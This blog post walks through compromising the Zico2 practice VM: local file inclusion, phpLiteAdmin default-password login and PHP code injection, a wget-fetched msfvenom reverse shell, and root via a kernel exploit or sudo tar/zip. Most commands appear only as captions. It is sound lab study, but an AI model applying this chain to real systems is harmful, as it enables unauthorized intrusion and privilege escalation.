Thursday, December 13, 2018

Zico 2


- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Zico2.

- Zico2 can be downloaded from here:,210/

- Once downloaded and extracted with VMware:


- Looking for zico2's IP:

- Scanning with Nmap:

- Dirbusting the web server we find an interesting folder dbadmin:

- Launching we also discover a view.php:

- Let's explore both view.php and /dbadmin.

- Connecting to the web server:

- Scrolling down and clicking about the "tools":

- So view.php leads us to try a Local File Inclusion that can exploit a Directory Path Traversal:

- Now it's time to explore dbadmin:

- Clicking test_db.php:

- Default password for phpLiteAdmin is admin:

- It is possible to create new databases:


- Looking for phpLiteAdmin vulnerabilities there is an exploit for Remote PHP Code Injection, what allows to inject code remotely to the server:

- Reading the first lines of the 24044.txt exploit:

- Going to exploit-db:

- Following instructions let's create hack.php:

- Adding a testing table prueba:

- Entering the Default Value <?php phpinfo()?>:

- Using the LFI from view.php we can successfully run the recently created database and check that the exploit works:

- Why not taking advantage of this Remote PHP Code Injection exploit to upload a shellcode and spawn a reverse shellcode?

- msfvenom helps to create our shellcode:

- Giving execution permissions:

- Setting a meterpreter session:

- Creating table 1 in database /usr/databases/hack.php:

- Now, it is important to analyze in detail the Default Value to be entered at Field 1:

  • system() -> executes an external program and displays the output
  • cd /tmp -> changing to writable folder /tmp
  • wget  -> transferring the exploit from Kali to Zico2
  • chmod 755 -> giving execution permissions to the exploit
  • ./myshell -> running the exploit

- view.php? helps us to run the exploit remotely:

- As a consequence a meterpreter session is achieved:

- Getting a shell:


- Improving the shell:

- Let's explore two ways for Privilege Escalation:

4.1 - Kernel exploitation

- The kernel is vulnerable to this exploit, what allows Local Privilege Escalation:

- Copy+Pasting the C program vnik.c to our local machine Kali:

- Transferring vnik.c from Kali to Zico2:

- Compiling vnik.c according to the instructions:

- Running vnik a root shell is achieved:

4.2 - Abusing tar and zip

- Listing /home/zico:

- Going to /wordpress:

- Reading wp-config.php we discover interesting credentials for user zico:

- Using these credentials:

- zico is a sudoer able to run /bin/tar and /usr/bin/zip as a root:

- tar and zip are able to run external commands supplied on the command line with the purpose of Privilege Escalation:

- For instance tar can be used to spawn a root shell in this way:

- In a similar way zip can be used to spawn a root shell:


- Inside the /root  folder we can read the file flag.txt: